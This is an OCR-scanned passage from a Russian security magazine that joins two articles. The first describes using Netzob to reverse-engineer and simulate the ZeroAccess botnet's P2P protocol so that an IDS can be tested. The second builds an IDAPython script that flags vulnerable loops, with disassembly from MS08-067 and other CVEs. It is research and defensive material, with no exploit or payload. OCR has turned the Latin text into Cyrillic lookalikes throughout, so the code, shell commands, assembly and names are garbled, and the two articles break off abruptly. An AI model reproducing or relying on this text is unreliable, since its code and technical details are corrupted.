также отражается время реакции для каждой пары входных и 
выходных символов. 

ПРЕДПОСЫЛКИ 

Наша задача — вывести словарь и грамматику протокола пере- 
дачи данных, чтобы выполнить его аудит (с помощью процедуры 
фаззинга) и оценить (используя симулятор трафика). Эти операции 
не требуют знания протокола, но тем не менее есть следующие 
требования: 

1. Для того чтобы узнать структуру протокола, нужны вводные 
данные. Значит, исследователь должен иметь примеры работы 
данного протокола. Это может быть что угодно, начиная с потока 
данных с канала 115В (например, внешние устройства) до сетево- 
го потока (например, С&С-команды ботнета), конфигурационных 
файлов итакдалее. 

2. У исследователя должно быть максимум информации об окруже- 
нии: ІР-адреса, имена хостов итакдалее. 

3. У исследователя должен бытьдоступ кпрограммам, которые 
используют данный протокол. Должна быть обеспечена возмож- 
ность автоматизации их выполнения и возврата к изначальному 
состоянию. Мы рекомендуем функцию снапшотов в ѴМѵѵаге 

или ѴИиаІВох. 

4. Естественно, протокол не должен включатьзашифрованное 
или сжатое содержание. Если таковое присутствует, эксперт мо- 
жет применить меры по энтропии, чтобы идентифицировать не- 
которые из них, и использовать инструменты вроде АРІ Ноокіпд, 
чтобы расчиститьданные. 

ВЫВОДИМ СЛОВАРЬ И ГРАММАТИКУ 
С ПОМОЩЬЮ МЕТ20В 

В этой части мы описываем процесс обучения, реализованный 
в ІМеІгоЬ и позволяющий вывести словарь и грамматику протокола 
в полуавтоматическом режиме. Этот процесс, проиллюстрирован- 
ный на рис. 3, состоит из трех шагов. 

ШАГ 1: КЛАСТЕРИЗАЦИЯ СООБЩЕНИЙ 
И РАЗДЕЛЕНИЕ ФЛАГОВ В ПОЛЯХ 

Чтобы определить формат символа, ІЧеІгоЬ поддерживает раз- 
личные способы разделения. В этой статье мы описываем самый 
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точный способ, использующий процессы выравнивания после- 
довательности. Эта техника позволяет выводить последова- 
тельности инвариантов в ряде сообщений. Когда разделение и 
кластеризация проведены, мы получаем первое приблизительное 
представление о формате сообщений. Следующий шаг состоит в 
определении атрибутов полей. 

ШАГ 2: ОПРЕДЕЛЯЕМ СВОЙСТВА ПОЛЕЙ 

Тип поля частично определяется на этапе разделения. Для полей, 
содержащих только инварианты, тип просто соответствует значе- 
нию инварианта. Для других полей тип выбирается автоматиче- 
ски, в первом приближении с помощью регулярного выражения, 
как показано на рис. 3. Эта форма позволяет легко проверить 
данные на валидность с определенным типом. Более того, ЫеІгоЬ 
позволяет визуализировать область допустимых значений для 
поля. Это помогает вручную усовершенствовать тип, связанный с 
областью. 

Некоторые внутрисимвольные зависимости определяются ав- 
томатически. Алгоритм поиска был разработан, чтобы определить 
возможный размер поля и указанную полезную нагрузку. 

Зависимость от окружения также выявляется в ходе поиска 
определенных значений, извлеченных во время захвата сообще- 
ния. Среди этих значений находятся параметры аппаратного обе- 
спечения, операционной системы и конфигурации сети. 




Рис. 3. Шаги выведения протокола в ЫеІюЬ 
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Рис. 4. Образцы, полученные ѴѴігезІіагк 



ШАГ 3: ПОСТРОЕНИЕ ГРАФИКА ПЕРЕХОДОВ ПРОТОКОЛА 

Третий шаг процесса обучения — это обнаружение и извлечение 
графика переходов исследуемого протокола. Это достигается ря- 
дом активных экспериментов с реальным клиентом или сервером, 
для чего нужно по порядку вводить последовательности входных 
сигналов и анализировать ответы. 

РЕАЛИЗАЦИЯ ИЕТ^ОВ 

На момент написания статьи исходный код ЫеІгоЬ содержал 
приблизительно 30 000 строк кода, главным образом на РуіЬоп 
и частично на С. Сырцы доступны в репозитории діі и в виде 
пакетов для БеЫап, Сепіоо, АгсЬ Ыпих и ѴѴіпсіоѵѵб. В настоящее 
время ЫеІгоЬ поддерживает х86 и х64 и включает следующие 
модули: 

• Модуль импорта: им порт да иных возможен двумя способами — 
либо при использовании специальных инструментов захвата, 
либо при помощи форматаХМБ. Поскольку протоколы передачи 
данных повсеместны, важно иметь возможность захватить 
данные в максимальном количестве контекстов. Поэтому ЫеІгоЬ 
предоставляетсобственные инструменты захвата и легко по- 
зволяет внедрение новых. Текущая работа сосредотачивается 
на анализе потока данных, который принимает сообщения 
открытымтекстом прежде, чем они будутзашифрованы. Кроме 
того, ЫеІгоЬ поддерживает много входных форматов, таких как 
сетевые потоки, файлы РСАР, структурированные файлы и меж- 
процессную коммуникацию (канал, сокет и совместно использу- 
емая память). 

• Модули определения протокола: расшифровка словаря и грам- 
матики составляют основу ЫеІгоЬ. 

• Экспериментальный модуль: одна из наших основных задач 
состоит в том, чтобы генерировать реальный сетевой трафик 
из недокументированных протоколов. Поэтому мы создали 
специальный модуль, который может моделировать протокол 
передачи данных между многими ботами и мастер-серверами, 
используя ранее заданный словарь и грамматику. Помимо 
использования той же самой модели, каждый «исполнитель» 
независим от других, и организованы приблизительно три глав- 
ныхстадии. Первая стадия — специальная библиотека, которая 
читаети пишет от сетевого канала. Также анализируется поток 

в сообщениях согласно предыдущим слоям протоколов. Вторая 
стадия использует словарьдля переработки полученных со- 
общений в символы и обратно, чтобы преобразовать получае- 



мые символы в сообщения. Буфер памяти также доступен, чтобы 
управлять отношен ия ми за в и сим остей. Последняя стадия соз- 
дает модель грамматики и вычисляет, какие символы должны 
бытьотправлены или получены согласнотекущему состоянию и 
времени. 

• Экспортный модуль: этот модуль позволяет экспортировать 
выведенную модель протокола в форматах, которые понятны 
внешнему программному обеспечению или человеку. Текущая 
работа сосредотачивается на экспортном формате, совмести- 
мом суниверсальными инструментами мониторинга (ѴѴі гезГіа гк, 
Беару) и фаззерами (РеасЬ, БиІІеу). 

ПРАКТИЧЕСКИЙ ПРИМЕР 

Мы опишем типичный случай использования ЫеІгоЬ — моделиро- 
вание и имитацию ботнета. После очень краткого описания сцена- 
рия мы объясним шагза шагом, какты сможешь вывести протокол 
2егоАссе55 Р2Р и сымитировать его. 

Допустим, ты специалист по информационной безопасности и 
твой босс назначил тебе новую цель для аудита. Твоя цель — Ю5/ 
ІР5 или очередной-очень-умный-высокоэффективный брандмау- 
эр, и ты хочешь проверить, обнаруживает ли он ботнеты и другие 
вредоносы. Это значит, что ты должен сам создать ботнет в своей 
лаборатории, используя ранее собранные образцы, и создать 
свою сеть из 100 зараженных хостов. Если у тебя нет на это време- 
ни и тебе нужно решение по генерированию реального трафика, 
то это тот случай, где требуется ЫеІгоЬ. С этим инструментом ты 
сможешь полностью определить протокол передачи данных не- 
обходимого Ьоіпеі и после этого смоделировать его. 

РЕВЕРСИВНАЯ ИНЖЕНЕРИЯ 
ПРОТОКОЛА 2ЕР0АССЕ55 Р2Р 

Первый шаг должен захватить образцы потока данных реального 
ботнета. Чтобы сделать это, тебе нужны образцы таіѵѵаге, своя 
любимая песочница и ѴѴігезИагк. 

На рис. 4 показан ряд пакетов ІЮР, посланных из твоей 
песочницы (192.168.42.41) к порту 16464 из ІР разных диапазонов 
(76.179.7.70, 115.22.87.69, ...). Это процедура начальной загрузки 
нашего образца. 

Все эти пакеты одной длины (58 байт) и кажутся довольно 
статичными. Когда пир отвечает, отсылается назад пакет ІЮР, 
который вызывает создание сессии ТСР между нашим образцом 
и удаленным пиром. 
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Вскрытие ботнета 




Рис. 5. Распределение байтов в (вероятно) зашифрованном сообщении 

Так как мы интересуемся протоколом Р2Р, мы извлекаем паке- 
ты ІЮР с источником или портом назначения 16464. Полученный 
РСАР может быть проанализирован в ІЧеІгоЬ. 

ЗАГРУЗКА И УСТАНОВКА МЕТ20В 

Так как ІЧеІгоЬ пока находится в статусе «бета», мы рекомендуем 
использовать последнюю доступную версию, которую можно най- 
ти на официальном діі-сервере: 

^І1= сіопе Іі1=1=р5://сІеѵ.пе1=2оЬ.ог^/^і1=/пе1=2оЬ.^і1=/ 

Для установки запускаем веіир.ру: 

руТбоп ве1:ир.ру Ьиіісі 
руѣбоп ве1:ир.ру сіеѵеіор 

Как только все готово, можно запустить ІЧеІгоЬ: 

^УпеІігоЬ 

СОЗДАНИЕ НОВОГО ПРОЕКТА 

Мы создаем новый проект под названием РЕ_2егоАссез5, куда им- 
портируются пакеты РСАР ІЮР. Цель нашей работы будет состоять 
в том, чтобы понять эти сообщения. 

РАСШИФРОВКА СЛОВАРЯ 

Первый шаг состоит в «игре» с особенностями ІЧеІгоЬ: разделение 
(выравнивание последовательности, основное выравнивание...), 
кодирование и свойства визуализации (шестнадцатеричная 
система, восьмеричная, строка...), поиск известного образца, раз- 
деление и объединение полей и так далее. 

Первичный анализ показывает некоторые статические и 
динамические поля фиксированной длины. Это хорошее нача- 
ло. Однако содержание области кажется довольно неуклюжим. 
Анализ распределения байтов (см. рис. 5) показывает, возможно, 
зашифрованное или подвергшееся обфускации содержимое. 

РАЗДЕЛЕНИЕ ФЛАГОВ В ПОЛЯХ 

После преобразования полезной нагрузки сообщения с помощью 
заложенного в ІЧеІгоЬ математического фильтра мы применяем 
процесс выравнивания на расшифрованных сообщениях, ис- 
пользуя функциональность выравнивания последовательности 
(см. рис. 6). Наша цель состоит в том, чтобы идентифицировать 
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Рис. 6. Параметры выравнивания последовательности 

общие сообщения, с целью перегруппировки их в специальные 
символы и получения разделенных полей. 

Когда это сделано, выравнивание показывает только один 
символ со всеми сообщениями, разделенными на 47 полей. Такое 
количество полей для одного типа символа по меньшей мере 
маловероятно. Это означает, что мы должны продолжить процесс 
выравнивания для этого символа и попытаться разделить его на 
разные символы. Таким образом, пошагово возрастает «порог 
подобия». При значении приблизительно в 70% мы получаем ин- 
тересный результат — два различных символа: первый содержит 
маленькие сообщения с тремя полями, в то время как второй со- 
держит 33 «маленьких» поля с чередующимися динамическими и 
статическими значениями и огромным статическим полем в конце. 
Мы не будем рассматривать эту огромную статическую область в 
этой статье и сконцентрируемся на первой части. 

Если представить сообщения в строчной форме, мы можем 
определить, что второе поле связано с командой ботнета. Первая 
команда — деЮ, как показано на рис. 7, и соответствует первому 
пакету, посланному вредоносом. Оказывается, что его формат со- 
общения идентичен каждому образцу от вредоноса. 

ОПРЕДЕЛЕНИЕ ДАННЫХ ОБ ОКРУЖЕНИИ 

Вторая команда — геЮ — связана с ответом запроса деЮ. По- 
скольку мы изучаем протокол Р2Р, который находит ІР-адреса 
других пиров, то попытаемся найти эти ІР в полезной нагрузке геЮ 
ответа сообщения. Чтобы это сделать, мы используем функцию по- 
иска зависимостей от переменных окружения. Мы просто ищем ІР- 
адреса, используемые во время обмена данных нашего вредоноса. 

После некоторых поисков мы можем найти многие из этих ІР- 
адресов в структурированном формате: 

[ІР1] хххх [ІР2] хххх [ІРЗ] хххх 

ІР-адреса появляются в обратном порядке. 

ОПРЕДЕЛЕНИЕ ОТНОШЕНИЙ 

Запускаем другую функцию ІЧеІгоЬ, которая пытается найти 
базовые отношения между полями в символе. В результате ІЧеІгоЬ 
находит, что четвертое поле связано с числом найденных ІР- 
адресов. Получающийся формат сообщения: 

ѴѴѴѴ [соттапсі] 000.. 000 [ІМЫР] [ІР1] хххх [ІР2] хххх \ 

* » давж а 

МОДЕЛИРОВАНИЕ ОТНОШЕНИЙ В ЫЕТ20В 

Формат сообщения и ожидаемое содержание каждого поля могут 
также быть представлены в виде дерева, как показано на рис. 8. 
Этот интерфейс, предусмотренный в ІЧеІгоЬ, позволяет указывать 
отношения между полями. Например, мы видели, что четвертое 
поле связано с числом ІР-адресов в полезной нагрузке. Мы можем 
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Рис. 7. Формат сообщения первой команды деН. 
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Рис. 8. Представление содержания полей 



указать это отношение в ЫеІгоЬ через интерфейс дерева. Может 
быть использован и другой вид отношения (размер поля, СРС, по- 
рядковый номер и так далее). 

Другое важное отношение, которое мы обнаружили, — то, что 
ІР-адрес, который появляется в полезной нагрузке, используется, 
чтобы начать соединение ТСР. В ЫеІгоЬ это отношение смодели- 
ровано, связывая содержание ІР-области с метаданными будущей 
сетевой коммуникации (в нашем примере — между целевым ІР 
и І_ауег4). Это отношение будет использовано во время моделиро- 
вания трафика, как описано ниже. 

РАСШИФРОВКА ГРАММАТИКИ 

ЫеІгоЬ позволяет полностью выводить и моделировать сложные 
грамматики. В нашем случае, чтобы упростить задачу, мы рас- 
сматриваем только два предыдущих символа (деН. и геІІ_). Полный 
процесс вывода словаря выделил бы другие символы, включая 
деіР, геіР, згѵ... 

Расшифровка грамматики основана на активном процессе 
выведения грамматики с помощью специального алгоритма, 
который включает симуляцию вредоноса. После каждой симуля- 
ции вредонос возвращается к своему начальному состоянию. Это 
достигается при помощи снапшотов в твоей любимой виртуаль- 
ной машине. 

Чтобы быть эффективным, этот модуль должен быть максималь- 
но настраиваемым и адаптироваться к множеству случаев. ЫеІгоЬ 
позволяет вывести грамматику сетевого сервера или сетевого 
клиента, а также вывести каналы обмена данных по ТСР и ІЮР. 

Исследователь может написать скрипт, который возвращает 
вредонос к его начальному состоянию. Простой скрипт восста- 
новления состояния, который остановит, очистит и перезапустит 
песочницу, основанную на ѴИиаІВох, выглядит так: 

#! /Ьіп/бН 



ѵЬохМате^'Таг^еТМіпсІомБХР" 

ѵЬоxIсI= ,, аЬ922с7е-1с88-404а-а9■Ра-87■РсI9сI4■р■Р59е ,, 

5парБІ^о1:IсI= ,, Nе1:2оЬКеасIу ,, 



ѵЬохшапа^е сопііпоіѵт $ѵЬохМате роыепо-РТ 
ѵЬохтапа^е БпарБНоІ: $ѵЬохМате геБІіопесиггепІ: 
ѵЬохтапа§е БІіагТѵт $ѵЬохМате --1:уре ИеасІІеББ 

МОДЕЛИРОВАНИЕ ТРАФИКА 

Предыдущие шаги показали, как ЫеІгоЬ может использоваться 
для понимания недокументированного протокола. Кактолько мы 
смоделировали словарь и грамматику протокола, мы можем легко 



сгенерировать валидный трафик, используя специальный режим 
работы инструмента. 

Допустим, мы хотим смоделировать работу клиента, который 
следует выведенному протоколу для коммуникации. Через не- 
сколько секунд мы можем проверить его спецификацию, создав 
сетевого исполнителя. Например, рис. 9 показывает параметры, 
требуемые для создания ^егоАссезз Воі, который подключится 
к исІр://1 1 5. 22. 87.69:16464 и начнет обмен данными согласно вы- 
веденной грамматике и словарю. 

После этого созданный исполнитель «ориентируется» 
в грамматике и выполняет переходы, соответствующие текущему 
состоянию. Если переходы валидны (а значит, валидны посланные 
и полученные сообщения), это приведет к изменению состояния. 
Существует три основныхтипа переходов: 

1. ОрепСЬаппеІТгапзШоп: открывает канал связи, следуя у ка- 
занному протоколу. Его параметры (ір_зоигсе, рогІ_зоигсе, 
і р сіезііпаііоп, рогІ_сІе5ІіпаІіоп) извлекаются из памяти. 

2. СІозеСЬаппеІТгапзШоп:закрываеттекущий канал связи. 

3. ВетіЭіосЬазІісТгапзШоп: получает, парсит (сохраняет получен- 
ныезначения полей в памяти) и отвечает, используя связанное 
сообщение. Типичный пример — переход, который ждет сообще- 
ния деН. и отвечает сообщением геІІ_. 

Простейшая модель бота, использующая грамматику, начинает 
обмен данными с первым пиром и прекращает ее после простого 
обмена запросами деИ/геИ. Спустя 500 мс он заново открывает 
соединение с одним из пиров из списка. Таким образом, симулятор 
может использоваться для построения карты ботнета и генерации 
валидного сетевого трафика. 

ЗАКЛЮЧЕНИЕ 

Инструмент ЫеІгоЬ создан для реверсивного инжиниринга и си- 
мулирования протокольной коммуникации. Данное ПО полезно 
для работы с недокументированными протоколами и анализа 
уязвимостей в собственных протоколах. Работа над инструментом 
продолжается в нескольких различных направлениях. Напри- 
мер, мы внедряем поддержку более сложных процедур фаззинга 
в рамках модуля симуляции трафика. В скором времени ЫеІгоЬ 
научится генерировать парсеры протоколов, что позволит рас- 
ширять функционал сторонних продуктов. Следи за развитием 
проекта! □С 
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Рис. 9. Создание симулятора бота ІегоАссезз 
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Поиск уязвимостей можно автоматизировать! 

В прошлом номере мы уже рассматривали не- 
сколько действенных приемов с использованием 
ЮАРуіЬоп. А в этот раз попробуем автоматизи- 
ровать поиск ошибок в такой конструкции, как 
цикл, разработав для этого полезный скрипт на 
Руібоп, использующий возможности ЮА Рго. 



ВВЕДЕНИЕ 

При поиске уязвимостей в программах с закрытым кодом цикл — 
один из ключевых паттернов, в котором часто присутствуют ошибки 
безопасности. Идентификация циклов часто оказывается одним из 
ключевых факторов реверс-инжиниринга. На функциональном уровне 
распознать цикл немудрено: его отличительная черта — это переход 
в обратном направлении, приводящий к повторному выполнению кода. 
То есть цикл — это многократно исполняемая последовательность ин- 
струкций. А единичное выполнение тела цикла именуется итерацией 
(повторением). В отличие от конструкции іпііпе тетсру, рассматрива- 
емой в предыдущей части, цикл может не иметь счетчика. Но он всегда 
имеетусловие окончания повторений. 

На приведенном примере два блока представлены в виде графа. 
Каждый блок имеет две точки: ту, на которую выполняется переход, 
и ту, с которой управление переходит далее. Путь идентификации 
цикла состоит в построении дерева доминаторов — родословной 
графа потока управления. На рисунке блок А является корнем дерева 
(«В компьютерных лесах деревья растут сверху вниз». Б. Шнайер) и до- 
минатором блока В, по-другому говоря — предком (предикатом). Соот- 
ветственно, блок В — потомок блока А. Ключевая особенность графа 
потока управления цикла в том, что потомок ссылается на предка. 

Идентифицировать цикл через построение дерева доминаторов 
способен плагин к ЮА І_оор йеіесііоп, скрипт ЛпсІІоор из Іттипііу 
йеЬиддег, І_оор соіогігег от Ильфака Гу ильфа нова. Но найти - это не 
то же самое, что и понять. Поэтому перейдем к примерам уязвимостей 
в циклах и их анализу. 

КОЛЕСО ПЕРЕРОЖДЕНИЙ 

Самая известная уязвимость в рассматриваемом паттерне — это пере- 
полнение буфера в интерфейсе РРС йСОМ. Печально известная уязви- 
мость стала результатом непроверяемого цикла копирования строки 
при выделении имен серверов из путей в формате У N С. 



тоѵ ах, [еах+4] 
стр ах. 'V 

22 бііогі: 1ос_761АЕ698 
зиЬ есіх, есх 
Ье§іп1оор : 

тоѵ [есх]. ах : пишем 

іпс есх ; итератор 

іпс есх 

тоѵ ах, [есх+есіх] 

стр ах, 'V ; п роверка с 'V 

дпг бііогі: Ье§іп1оор 

ІІІМС-строка задается в формате «\\сервер\ресурс\путь» и передает- 
ся в юникоде. Приведенный цикл пропускает первые четыре байта (сим- 
волы \\) и копирует данные в приемный буфер вплоть до обнаружения 
завершающего обратного слеша (символа «\»), без какой-либо проверки 
размера. Такой цикл (который ограничен не количество копируемых 
байт, а фактом встречи с определенным значением) попадает в прицел 
эксплоитера, который размыкает его лишь после перезаписи управля- 
ющего элемента в стеке. То есть поток выполнения программы в цикле 
освобождается лишь при встрече с какой-то инструкцией, но не после 
определенного количества повторов. Такая ошибка программирования 
является фундаментальной для безопасного программирования. 

Подобный натюрморт наблюдается в дефектном коде бюллетеня 
М508-067: 

Ье§іп_1оор: 

тоѵ еах, сімогсі рііг [еЬх] 
тоѵгх есх,ыогсІ рііг [еах] 

стр есх,5СІі п ров ерка с 'V 

де оігЬ_о-Р_1оор ;на выход 

тоѵ еах.сімогсі рііг [еЬх] 
стр еах,сІыогсІ рі :г [ѳбі] 

де ои1і_оТ_1оор цна в ыход 

тоѵ еах, сіѵѵогсі рііг [еЬх] 
зиЬ еах, 2 ; итератор 

тоѵ сіѵѵогсі рііг [еЬх].еах ; пишем 

^тр Ье§іп_Іоор 

Но и современность также балует уязвимыми циклами. Взглянем на 
недавнюю уязвимость в 5АР ІМеіѴѴеаѵег (СѴЕ-201 2-261 1 ): 

Ье§іп_1оор: 

стр есІх,2 
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тоѵ [еЬр+ЭаіаЕпсІ] , ТгасеІігРо 

пт сору мііб ипісосіе сопѵегзіоп -.переход внутри 

;тела 

тоѵ сіх. ТгасеІігРо 

тоѵ [еЬр+еах* 2 +ѵаг_сІ] ,сіх ; запись в память 

З'тр 1 оор_епсІ 

сору_ыі1:Іі_ипісосІе_сопѵег5Іоп : 

тоѵіх сх, Ьуіе ріг [Тгасеіп-Ро] 

тоѵ [еЬр+еах* 2 +ѵаг_сІ] , сх ;запись в п амять 

ІоорепсІ: 

стр [еЬр+еах* 2 +ѵаг_сІ ] ,0 :пока не встретится 

; ноль 

32 оиі_о-Р_1рор 



асісі еах ,1 ; и нкремент 

а<М ТгасеІітЕо.есІх 
дтр Ье§іп_1оор 

Условие выхода из тела в приведенном примере — это встреча 
с нулем. В поиске зеро обусловленный поток управления в таком 
цикле может проходить не по всем блокам тела цикла. От чего фак- 
тор записи в память и условия выхода из тела не меняются. Таким 
образом, без построения дерева доминаторов можно обойтись. 
Достаточно найти путь между начальным и конечным адресами. 

Нас интересуют только точки выхода (условные джампы с выше- 
стоящими инструкциями сравнения) и контролируемость значений, 
участвующих в сравнении. 

Как известно, подход к операции сравнения качественно может 
изменить то, что ожидалось. Иначе получается как всегда. В следу- 
ющем примере приветливо сияют женской логикой знаковый пере- 
ход и инструкция умножения. Причем в умножении участвуют те, от 
кого зависит выход. Взглянем на целочисленное переполнение в 
ХпѴіеѵѵ: 

Ье§іп_1оор: 

хог есх.есх 
тоѵ есІх, [есіі] 
тоѵ сх_д_[еЬр+е] 

ітиі есх,еах ; операция умн ожен и я с 

^услови ями выхода 

тоѵ [есіх+еах*4] «есх 
йюѵ вех. [ѳсІі+&] 
іпс еах 
стр еах,есх 
Л збогі Ье§іп_1оор 

В этом примере арифметические операции с регистрами — 
операторами сравнения и знаковый переход привлекает внимание 
несовершенством целочисленных операций. И как всегда, арифме- 
тические операции участвуют в колдовстве. 

Подведем промежуточный итог. Что же такое уязвимость цикла? 
Исходя из корня слова «определение», обозначим границы контро- 
ля за циклом. Из приведенных выше листингов дефектного кода 
следует, что интересность цикла — это фактор записи + фактор 
контроля за условием выхода из цикла. 

В следующем примере показаны варианты контроля за циклом. 
Речь об уязвимости в МісгозоЙ Ѵесіог ЗгарЫс гепбегіпд Епдіпе 
(СѴЕ-2006-4868). Вот код: 



Ье§іп_1оор: 



тоѵ 


есіх. [есх+ 8 ] 


тоѵ 


еЬх, [есх] 


тоѵ 


сіх ^ [еЬх+есІх* 2 ] 


іезі: 


СІХ ^ СІХ 


12 


зііогі 1ос_50Е0Е02Р ;пока не Ѳ 




сіх, 206 


ЗП 2 


збогі Іос 5РЕРЕР1Е :пока не 206 




Рис. 1. Структура цикла 





дя 


збопі Іос БОЕОЕйЗЗ 




З’тр 


з богі Іос 50ЕЭЕ024 


Іос 


БОЕОЕЭІЕ : 






тоѵ 


[есіі] . сіх 




іпс 


езі 




іпс 


есіі 




іпс 


есіі 


Іос 


50Е0Е024: 






іпс 


сімогсі ріг [есх+ 8 ] 




тоѵ 


есіх, [есх+ 8 ] 




стр 


есіх. [есх+4] 




з‘і 


збогі Ьедіп_1оор 



Пример от остальных мало чем отличается, а приведен, чтобы 
показать то, что называется {аізе розіііѵез — отрицательный ре- 
зультат анализа. 2ЕПТ (2егосІау Етегдепсу Резропзе Теат) добави- 
ла проверку значения, находящегося по адресу [есх+4], тем самым 
условие выхода из цикла стало «прибито гвоздями» (захардко- 
дено). МісгозоЙ же в своем патче добавила проверку итератора. 
Здесь их парочка, но проверки одного достаточно: 

стр езі, ѲРЕб 

дпЬ збогі зкір_сору 



тоѵ [есіі] . сіх 

іпс езі 

іпс есіі 

іпс есіі 

Отметим, что, если значение езі контролируется, при знаковом 
переходе после сравнения можно было бы по-прежнему «об- 
ладатьтелом цикла». Но использование беззнакового перехода 
]пЬ закрыло путь-дорожку к эксплуатации. В патче от 4ЕРТ также 
семейка знаковых переходов была обделена вниманием. 

В итоге имеем проверку одного из итераторов и одного из эле- 
ментов проверки выхода из цикла. То есть, для скрипта возникает 
две задачи обработки двух последовательностей инструкций: 
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стр ге§ Ъ2 3 ітт3 2 ; сравнение итератора 



і пс | а сісі | 5и Ь | с іес ге§32 
и 

стр ге§ Ъ2, Ітт3 2 



стр ѲорпсІ. ІорпсІ :где ге§ 32 - один из операндов 

З'итр оиі_о-Р_1оор ;на выход из цикла 

Куда же без основной задачи реверс-инжиниринга: «будет ли 
X иметь значение У после заданного набора инструкций?». Наряду 
с іпііпе тетсру, анализ циклов также нуждается в трассировке 
регистров. 

Продолжая тему {аізе розіііѵе (истинно негативных) признаков, 
следует обратить внимание на то, что цикл может быть подобен од- 
ной из инструкций зіозЬ/зіозѵѵ/зіозсі, пишущих в память константу. 

Но вернемся к пониманию прекрасного — свойствам потенци- 
ально уязвимого цикла: 

• записи в память непостоя иного значения; 

• отсутствию корректной проверки выхода из цикла. 

С этим багажом начинаем реализовывать задачу поиска тела 
цикла и проверки на вшивость. Основная задача — анализ усло- 
вий выхода из тела цикла. 

КОНТРОЛИРУЕМЫЙ ВЫХОД ИЗ ТЕЛА. 

АСТРАЛЬНЫЕ ПРАКТИКИ 

Предлагаемое заклинание кода имеет следующие этапы: 

1. Поиск тел а цикла (пикап). Составляем список всех условных 
переходов и адресовтела. 

2. Поискпаттерназаписи. 

3. Поискусловий выхода. 

• Поиск условных переходов, указывающих на выход из тела. 

• Поиски анализ инструкций сравнения. 

4.1 .Трассировка операнда инструкции сравнения. 

4. 2. Поиск итератора и трассировка его операнда. 

Алгоритм поиска тела цикла базируется на построении 
трассы выполнения от начала цикла до точки, с которой все 
возвращается на круги своя. Для части циклов эта трасса будет 
полностью охватывать тело. И это не единственное ограниче- 
ние предлагаемого концепт-скрипта. С вложенными циклами 
и с теми, где адрес макушки цикла больше, чем адрес его стоп, 
также работа не ведется. 

Деятельность по исследованию цикла начинается с того, что 
функция берет адрес перехода назад. И, используя адрес начала цик- 
ла, ищет путь к нему. Тем самым проходя по всему телу либо его части, 
попутно составляя список адресов тела и условных переходов. 

мЬіІе асИг ! =5І:аг1:асІсІг : 

# Получаем ссылки 

хге-Р1=Кбгз1:В(ас1с1г') 

х г еТ2 = Кп ехТ ( а сі сі г , 0 ) 

# Отсев ненужных ссылок 

і-р хгеТ2 ! =0х-р-р-р-р-р-р-р-р апсі <Зе1=Мпет( ас ісіг ) !="са11" апсі \ 

Се1:Мпет(асІсІг) ! ="ітр" : 

# Добавляем адрес с условным переходом в список 

ЬгапсЬроіпіз . аррепсі(асісіг) 

# Проверка на пропасть 

ІТ хге-Рі == Ѳх-Р-Р-Р-Р-Р-Р-Р-Р: 

Ьгеак 

асИг=хге-Р1 

# Добавляем текущий адрес к списку с телом цикла 

ЬосІуасИг. аррепсІР асісіг) 



; итератор 



•.сравнение операнда проверки 




Рис. 2. Цикл в ША 



Затем, используя список адресов, находим паттерн записи в 
память — инструкцию тоѵ, где 0-й операнд — память, а 1-й — 
регистр (прим.: тоѵ [еах],есх). Темная сторона этого свойства 
(деготь в меде) проявляется, когда 1-й операнд — постоянное 
значение (прим.: ОхВААйРОСЮ — потеря аппетита от такой пищи 
гарантирована). 

■Рог асісіг іп ЬосІуасИг: 

і-р 6е1:Мп ет( асИг)==' І тоѵ" : 

# Список "памятных" типов: базовый 

# регистр + индексный регистр, базовый 

# регистр + индексный регистр + смещение 

тет1:уре5^[З л 4] 

і-Р 6е1:ОрТуре(асИг.0) іп тепгЕурез: 

# Если 1 -й операнд регистр 

і-р 6еі:0рпсІ(асИг л 1)==1: 

# Цикл пишущий, вернем истину 

геіигп 1 



Далее ищутся условные переходы, указывающие за пределы 
цикла. 

•Рог асісіг іп ЬгапсЬроіпіз: 

# Получаем ссылки 

хге-Р1=Кбгз1:(асИг) 

хгеТ2=Кпех1:(асІсІг л Ѳ) 

# Если одна ссылка указывает на тело 

і-р хге-РІ іп ЬосІуасИг: 

# займемся второй 

# Фѵнкиия-ищейка попытается найти тело за 20 

# шагов и помашет флажком 

Р1а§=5еагсЬВосІуАсІсІг(хге-Р2) 

еізе: 

Р1а§=5еагсЬВосІуАсІсІ г (хге-Рі) 
і-р Р1а§ ==1: 

# Удалим переход-инсайдер 

ЬгапсЬроіпіз . гетоѵе(асИг) 

Теперь от каждого )итр-а, указывающего из тела, ведется поиск 
компараторов — инструкций сравнения стр, Іезі. Нулевой операнд 
каждого «сравнивателя» скармливается функции трассировки, 
дабы познать значение регистра-операнда. 

# Список инструкций сравнения 

стр5=^ І _стр' л Чезі ' ] 

# за небольшое кол-во шагов 

■Рог соипі іп гап§е(5): 

# пока не найден сравниватель 



092 



ХАКЕР 11 /166/2012 



Ищем ошибки в циклах 



мЬіІе СеіМпет(асІсІг) поі іп стрз: 
асИг=КРіг5іВ(асІсІг) 
і-р 6еіМпет(ас1с1г)=="іе5і" : 

# Если "внетелесный джамп" один-одинешенек. 

# то имеем дело с проверкой на ноль 

# (іезі ге§.ге§ эквивалентно стр ге§.0^ 

і-р 1еп(ЬгапсЬроіпі5)==1: 

# Добрые вести 

ргіпі "іприі іб ехііі сопсііііоп ! " 
ѵиіпсоипі+^і 
Ьгеак 

# Встречая стр, где 1-Й операнд != константе 

і-р СеіМпет(асIсIг)== ,, стр ,, апсі СеіОрТуре(асІсІг., 1) ! =5 : 

# передаем нулевой операнд трассировщику 
ге§=6еі0рпсІ (асісіг ,,0) 

ТгасеѴа1(ге%. асісіг. ііѳгб) 

Ьгеак 

# Нашла коса на камень 

і-р 6еі^ / 1пет(асIсIг)== ,, стр ,, апсі СеіОрТуре(асІсІг., 1)==5 : 

# Печалька 

ЬагсІсосІесІ=1 

# Не теряя надежду, шагая вниз, ищем Ц&1] 

•Рог соипі іп гап%е(5): 

асІсІг=КРіг5і( асісіг) 
іі_ СеіМпет(асІсІг) іп 5І§п]итрв: 
ѵи!псоипі+=1 



Трассировка нужна и в отношении операнда итератора (счетчи- 
ка). Если итераторов несколько, то необходимо проверить операнд 
каждого из них, в связи с возможностью присутствия проверки 
количества прохождений цикла. Трассировка итератора отлична от 
трассировки нулевого операнда инструкций сравнения стр и ІезЕ 
Как видно из примеров уязвимых циклов, если операнд итератора 
сравнивается с константой и переход после сравнения беззнако- 
вый, то это однозначный провал операции по захвату тела. При 
знаковом переходе надежда еще есть. 

іпс ге§32 

ст р ге§ 32, ітт32 

З'пЬ оиі_1оор 

Составляем список итераторов тела 

# Список возможных итераторов 

і1=ег1І5І==["іпс" . "асИ" . "зиЬ" . "сіес"] 

# П рипасаем вместил ище 

ііег5=[] 

# В списке адресов тела ищем цели 

